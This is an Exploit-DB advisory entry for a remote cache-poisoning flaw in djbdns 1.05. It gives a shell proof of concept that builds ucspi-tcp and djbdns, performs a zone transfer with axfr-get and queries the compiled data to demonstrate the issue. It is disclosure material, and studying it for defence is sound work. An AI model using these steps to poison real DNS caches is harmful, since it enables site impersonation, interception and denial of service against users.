djbdns 1.05 - Long Response Packet Remote Cache Poisoning

EDB-ID:

32825




Platform:

Linux

Date:

2009-02-27


source: https://www.securityfocus.com/bid/33937/info

The 'djbdns' package is prone to a remote cache-poisoning vulnerability.

An attacker may leverage this issue to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.

This issue affects djbdns 1.05; other versions may also be vulnerable.

# Download and build ucspi-tcp-0.88.
$ curl -O http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz
$ tar -zxf ucspi-tcp-0.88.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > ucspi-tcp-0.88/conf-cc
$ make -C ucspi-tcp-0.88

# Download and build djbdns-1.05.
$ curl -O http://cr.yp.to/djbdns/djbdns-1.05.tar.gz
$ tar -zxf djbdns-1.05.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > djbdns-1.05/conf-cc
$ make -C djbdns-1.05

# Use tcpclient and axfr-get to do a zone transfer for
# www.example.com from www.example2.com.
$ ./ucspi-tcp-0.88/tcpclient www.example.com 53 ./djbdns-1.05/axfr-get www.example.com data data.tmp

# Use tinydns-data to compile data into data.cdb.
$ ./djbdns-1.05/tinydns-data

# Simulate an A query for www.example.com using the data
# from the zone transfer.
$ ./djbdns-1.05/tinydns-get a www.example.com